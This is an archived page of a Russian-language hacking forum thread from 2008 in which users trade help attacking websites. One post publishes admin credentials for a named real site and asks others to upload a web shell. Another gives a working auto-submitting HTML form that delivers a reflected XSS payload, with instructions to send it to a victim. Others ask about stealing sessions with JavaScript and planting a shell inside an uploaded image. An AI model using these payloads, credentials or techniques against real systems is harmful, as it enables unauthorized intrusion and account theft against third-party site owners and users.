ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3251  
Старый 09.09.2008, 21:04
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Grema
ua-foto.com/admin/ - admin:stepanov

немогу залить шелл) попробуйте..
 
Ответить с цитированием

  #3252  
Старый 09.09.2008, 21:57
dArKkNiGHt
Новичок
Регистрация: 18.08.2008
Сообщений: 8
Провел на форуме:
56704

Репутация: 5
По умолчанию

не могу догнать что можно сделать:
нашёл xss в поиске,
Код:
"><script>alert(/xss/)</script>
показывает мне сообщение. форма поиска методом POST работает.
я так понимаю это пассивная xss и мне нужно каким-то образом заставить админа кликнуть на Поиск с моими параметрами?
какие ещё могут быть варианты применения данной дыры?
 
Ответить с цитированием

  #3253  
Старый 09.09.2008, 22:52
Spyder
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076

Репутация: 4303


По умолчанию

посмотри , скорее всего в гете тоже есть полный вид запроса
Если нет, отлови ПОСТ запросы и попробуй через гет отправить
 
Ответить с цитированием

  #3254  
Старый 09.09.2008, 23:00
De-visible
Banned
Регистрация: 06.01.2008
Сообщений: 904
Провел на форуме:
4037638

Репутация: 1821


Отправить сообщение для De-visible с помощью ICQ
По умолчанию

Цитата:
Сообщение от dArKkNiGHt  
не могу догнать что можно сделать:
нашёл xss в поиске,
Код:
"><script>alert(/xss/)</script>
показывает мне сообщение. форма поиска методом POST работает.
я так понимаю это пассивная xss и мне нужно каким-то образом заставить админа кликнуть на Поиск с моими параметрами?
какие ещё могут быть варианты применения данной дыры?
Есть парочку показательных видео..что делать с пассивками как впаривать, и вообще как обращаться)
Гляньтут
 
Ответить с цитированием

  #3255  
Старый 09.09.2008, 23:02
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию

PHP код:
<form name='wtf' method='post' action='http://site.ru/search.php'>
<
input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
</
form>
<
script>wtf.submit();</script
правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве
__________________
 
Ответить с цитированием

  #3256  
Старый 09.09.2008, 23:18
Karapuziko
Познающий
Регистрация: 20.01.2008
Сообщений: 47
Провел на форуме:
71868

Репутация: 72
По умолчанию

Цитата:
Сообщение от +toxa+  
PHP код:
<form name='wtf' method='post' action='http://site.ru/search.php'>
<
input type='hidden' name='search' value='"><script>alert(/xss/)</script>'>
</
form>
<
script>wtf.submit();</script
правишь то что тебе надо, сохраняешь в .html и кидаешь ссылку на файл жертве
Можно ли как то на JavaScript выдернуть сессию?
то есть не куки а сессию...?
 
Ответить с цитированием

  #3257  
Старый 10.09.2008, 02:50
Rejjin
Познающий
Регистрация: 20.07.2008
Сообщений: 94
Провел на форуме:
546634

Репутация: 97
По умолчанию

Вот не могу понять, есть сайт http://www.wen.ru/ на нем есть форум. Шелл просто так не залить, для картинки просит урл. Можно ли сделать так. Залить картинку в которой будет либо шелл, либо редирект на урл с шеллом. И получится ли? А может есть какой то другой способ?
 
Ответить с цитированием

  #3258  
Старый 10.09.2008, 07:32
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию

Rejjin, чтобы шелл-картинка сработал надо иметь инклюд под рукой. Или он просто не выполница как пхп-код и всё.
 
Ответить с цитированием

  #3259  
Старый 10.09.2008, 16:09
o3,14um
Участник форума
Регистрация: 16.11.2006
Сообщений: 230
Провел на форуме:
599789

Репутация: 227
По умолчанию

забыл как называется данный движок.
Вот скрин админки:


кто знает - отпишитесть
 
Ответить с цитированием

  #3260  
Старый 10.09.2008, 22:47
.Striker
Участник форума
Регистрация: 11.11.2007
Сообщений: 260
Провел на форуме:
2808062

Репутация: 155
По умолчанию

o3,14um
cutenews
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ